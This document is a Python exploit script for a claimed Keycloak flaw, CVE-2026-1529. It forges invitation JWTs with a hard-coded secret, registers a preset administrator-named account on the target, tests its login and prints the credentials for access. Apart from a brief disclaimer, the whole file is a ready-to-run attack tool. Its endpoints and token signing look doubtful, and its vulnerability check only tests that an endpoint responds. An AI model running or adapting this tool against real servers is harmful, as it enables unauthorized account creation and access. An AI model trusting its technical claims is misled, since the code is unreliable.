#!/usr/bin/env python3 """ CVE-2026-1529 Keycloak Exploit Tool Keycloak: Unauthorized organization registration via improper invitation token validation by f3ds cr3w est, 2002 """ import argparse import json import logging import sys import os from datetime import datetime from typing import Dict, Any, Optional from urllib.parse import urlparse # Add utils directory to path sys.path.append(os.path.join(os.path.dirname(__file__), 'utils')) from utils.jwt_utils import JWTManipulator from utils.http_utils import HTTPClient from utils.crypto_utils import CryptoUtils # Setup logging logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', handlers=[ logging.StreamHandler(sys.stdout) ] ) logger = logging.getLogger(__name__) class KeycloakExploit: """Main exploit class for CVE-2026-1529""" def __init__(self, target_url: str, config_path: str = None): self.target_url = target_url.rstrip('/') self.config = self._load_config(config_path) self.http_client = HTTPClient(self.target_url, timeout=self.config['exploit']['timeout'], max_retries=self.config['exploit']['max_retries']) self.jwt_manipulator = JWTManipulator( secret_key=self.config['jwt']['secret_key'], algorithm=self.config['jwt']['algorithm'] ) # Create output directories os.makedirs('logs', exist_ok=True) os.makedirs('output', exist_ok=True) os.makedirs('output/reports', exist_ok=True) logger.info(f"Initialized exploit for target: {self.target_url}") def _load_config(self, config_path: str = None) -> Dict[str, Any]: """Load configuration from file""" try: if config_path: with open(config_path, 'r') as f: config = json.load(f) else: with open('config/default_config.json', 'r') as f: config = json.load(f) logger.info("Configuration loaded successfully") return config except Exception as e: logger.error(f"Failed to load configuration: {e}") # Use default configuration return { "exploit": { "default_username": "admin_user_2026", "default_password": "KeycloakCVE2026!", "default_email": "exploit@admin.com", "timeout": 30, "max_retries": 3 }, "jwt": { "algorithm": "HS256", "secret_key": "keycloak-cve-2026-1529-exploit", "token_expiry": 3600 }, "target": { "endpoints": { "realms": "/realms", "organizations": "/organizations", "register": "/register", "login": "/login" }, "headers": { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Accept": "application/json", "Content-Type": "application/json" } }, "output": { "log_level": "INFO", "save_reports": True, "report_format": "txt" } } def check_target_vulnerability(self) -> bool: """Check if target is vulnerable to CVE-2026-1529""" try: logger.info("Checking target vulnerability...") # Check if Keycloak is accessible if not self.http_client.check_keycloak_health(): logger.error("Target is not accessible or not a Keycloak instance") return False # Detect Keycloak version version = self.http_client.detect_keycloak_version() if version: logger.info(f"Target Keycloak version: {version}") # Test organization endpoints org_endpoint = self.config['target']['endpoints']['organizations'] if not self.http_client.test_endpoint(org_endpoint): logger.warning("Organization endpoint not accessible") return False logger.info("Target appears to be vulnerable to CVE-2026-1529") return True except Exception as e: logger.error(f"Vulnerability check failed: {e}") return False def generate_invitation_token(self, org_id: str, email: str) -> Optional[str]: """Generate an invitation token for testing""" try: logger.info(f"Generating invitation token for org: {org_id}") # Generate a basic token for testing token = self.jwt_manipulator.generate_invitation_token( org_id=org_id, email=email, expires_in=self.config['jwt']['token_expiry'] ) logger.info("Invitation token generated successfully") return token except Exception as e: logger.error(f"Failed to generate invitation token: {e}") return None def manipulate_token(self, token: str, new_org_id: str, new_email: str = None) -> Optional[str]: """Manipulate JWT token for exploit""" try: logger.info("Manipulating JWT token...") # Validate token structure if not self.jwt_manipulator.validate_token_structure(token): logger.error("Invalid token structure") return None # Manipulate token manipulated_token = self.jwt_manipulator.manipulate_token( token=token, new_org_id=new_org_id, new_email=new_email ) logger.info("JWT token manipulation completed") return manipulated_token except Exception as e: logger.error(f"Token manipulation failed: {e}") return None def register_user_with_token(self, token: str, username: str, password: str, email: str) -> bool: """Register user using manipulated token""" try: logger.info("Attempting user registration with manipulated token...") # Prepare registration data registration_data = { "username": username, "password": password, "email": email, "token": token, "firstName": "Exploit", "lastName": "User" } # Make registration request register_endpoint = self.config['target']['endpoints']['register'] response = self.http_client.post(register_endpoint, data=registration_data) if response.get('status') == 'created' or response.get('success'): logger.info("User registration successful") return True else: logger.error(f"User registration failed: {response}") return False except Exception as e: logger.error(f"Registration failed: {e}") return False def test_user_login(self, username: str, password: str) -> bool: """Test user login with created credentials""" try: logger.info("Testing user login...") login_data = { "username": username, "password": password, "grant_type": "password" } login_endpoint = self.config['target']['endpoints']['login'] response = self.http_client.post(login_endpoint, data=login_data) if response and 'access_token' in response: logger.info("User login successful") return True else: logger.error("User login failed") return False except Exception as e: logger.error(f"Login test failed: {e}") return False def generate_login_link(self, username: str) -> str: """Generate login link for the created user""" try: parsed_url = urlparse(self.target_url) login_url = f"{parsed_url.scheme}://{parsed_url.netloc}/realms/master/account" logger.info(f"Generated login link: {login_url}") return login_url except Exception as e: logger.error(f"Failed to generate login link: {e}") return self.target_url def generate_report(self, results: Dict[str, Any]) -> str: """Generate exploit report""" try: timestamp = datetime.now().strftime("%Y%m%d_%H%M%S") report_filename = f"output/reports/exploit_report_{timestamp}.txt" report_content = f""" CVE-2026-1529 Exploit Report ============================ Target: {self.target_url} Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')} by f3ds cr3w est, 2002 Exploit Results: --------------- Vulnerability Check: {'SUCCESS' if results.get('vulnerable') else 'FAILED'} Token Generation: {'SUCCESS' if results.get('token_generated') else 'FAILED'} Token Manipulation: {'SUCCESS' if results.get('token_manipulated') else 'FAILED'} User Registration: {'SUCCESS' if results.get('user_registered') else 'FAILED'} User Login: {'SUCCESS' if results.get('user_login') else 'FAILED'} Created User: ------------- Username: {results.get('username', 'N/A')} Password: {results.get('password', 'N/A')} Email: {results.get('email', 'N/A')} Login Link: ----------- {results.get('login_link', 'N/A')} Technical Details: ----------------- Original Token: {results.get('original_token', 'N/A')[:50]}... Manipulated Token: {results.get('manipulated_token', 'N/A')[:50]}... Organization ID: {results.get('org_id', 'N/A')} CVE Details: ----------- CVE ID: CVE-2026-1529 Description: Keycloak: Unauthorized organization registration via improper invitation token validation CVSS: Not yet assigned Attack Vector: Network Attack Complexity: Low Exploit Method: --------------- 1. Generate or obtain organization invitation token 2. Manipulate JWT payload to change organization ID 3. Use manipulated token to register unauthorized user 4. Test login with created credentials 5. Provide login link for access Security Advisory: ----------------- This exploit demonstrates a critical vulnerability in Keycloak that allows unauthorized organization registration. Organizations should apply the latest security patches and implement proper token validation. Disclaimer: ----------- This tool is for educational and security testing purposes only. Use only on systems you have explicit permission to test. """ with open(report_filename, 'w') as f: f.write(report_content) logger.info(f"Report generated: {report_filename}") return report_filename except Exception as e: logger.error(f"Failed to generate report: {e}") return "" def run_exploit(self, custom_token: str = None, custom_org_id: str = None) -> Dict[str, Any]: """Run the complete exploit""" results = { 'vulnerable': False, 'token_generated': False, 'token_manipulated': False, 'user_registered': False, 'user_login': False, 'username': '', 'password': '', 'email': '', 'login_link': '', 'original_token': '', 'manipulated_token': '', 'org_id': '' } try: logger.info("Starting CVE-2026-1529 exploit...") # Step 1: Check vulnerability logger.info("Step 1: Checking target vulnerability...") if not self.check_target_vulnerability(): logger.error("Target is not vulnerable") return results results['vulnerable'] = True # Step 2: Generate or use provided token logger.info("Step 2: Generating invitation token...") if custom_token: results['original_token'] = custom_token token = custom_token else: # Generate test token org_id = custom_org_id or "test_org_123" email = self.config['exploit']['default_email'] token = self.generate_invitation_token(org_id, email) if token: results['original_token'] = token results['token_generated'] = True if not token: logger.error("Failed to generate token") return results # Step 3: Manipulate token logger.info("Step 3: Manipulating JWT token...") new_org_id = "exploited_org_" + CryptoUtils.generate_secure_username("", 8) manipulated_token = self.manipulate_token(token, new_org_id) if manipulated_token: results['token_manipulated'] = True results['manipulated_token'] = manipulated_token results['org_id'] = new_org_id else: logger.error("Failed to manipulate token") return results # Step 4: Generate user credentials logger.info("Step 4: Generating user credentials...") username = self.config['exploit']['default_username'] password = self.config['exploit']['default_password'] email = self.config['exploit']['default_email'] results['username'] = username results['password'] = password results['email'] = email # Step 5: Register user logger.info("Step 5: Registering user with manipulated token...") if self.register_user_with_token(manipulated_token, username, password, email): results['user_registered'] = True # Step 6: Test login logger.info("Step 6: Testing user login...") if self.test_user_login(username, password): results['user_login'] = True # Step 7: Generate login link results['login_link'] = self.generate_login_link(username) # Generate report if self.config['output']['save_reports']: report_file = self.generate_report(results) results['report_file'] = report_file logger.info("Exploit completed successfully") return results except Exception as e: logger.error(f"Exploit failed: {e}") return results def main(): """Main function""" parser = argparse.ArgumentParser( description='CVE-2026-1529 Keycloak Exploit Tool', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: python keycloak-exploit.py https://target-keycloak.com python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... https://target-keycloak.com python keycloak-exploit.py -o custom_org_id https://target-keycloak.com python keycloak-exploit.py -h """ ) parser.add_argument('target', help='Target Keycloak URL (IP or domain)') parser.add_argument('-t', '--token', help='Custom invitation token to use') parser.add_argument('-o', '--org-id', help='Custom organization ID') parser.add_argument('-c', '--config', help='Path to configuration file') parser.add_argument('-d', '--debug', action='store_true', help='Enable debug logging') parser.add_argument('-v', '--version', action='version', version='CVE-2026-1529 Exploit Tool v1.0 by f3ds cr3w est, 2002') args = parser.parse_args() # Validate target URL if not CryptoUtils.validate_url_format(args.target): print("Error: Invalid target URL format") sys.exit(1) # Setup logging level if args.debug: logging.getLogger().setLevel(logging.DEBUG) try: # Run exploit exploit = KeycloakExploit(args.target, args.config) results = exploit.run_exploit(args.token, args.org_id) # Display results print("\n" + "="*60) print("CVE-2026-1529 EXPLOIT RESULTS") print("="*60) if results['vulnerable']: print("✓ Target is vulnerable to CVE-2026-1529") else: print("✗ Target is not vulnerable") sys.exit(1) if results['user_registered'] and results['user_login']: print("\n🎯 EXPLOIT SUCCESSFUL!") print(f"Username: {results['username']}") print(f"Password: {results['password']}") print(f"Email: {results['email']}") print(f"Login Link: {results['login_link']}") if 'report_file' in results: print(f"\n📄 Report saved to: {results['report_file']}") print("\n🔐 Use the provided credentials to access the Keycloak instance!") print("⚠️ This demonstrates unauthorized access due to CVE-2026-1529") else: print("\n❌ EXPLOIT FAILED!") print("Check logs for details: logs/exploit.log") sys.exit(1) print("\n" + "="*60) print("by f3ds cr3w est, 2002") print("="*60) except KeyboardInterrupt: print("\n\n⚠️ Exploit interrupted by user") sys.exit(1) except Exception as e: print(f"\n❌ Error: {e}") sys.exit(1) if __name__ == "__main__": main()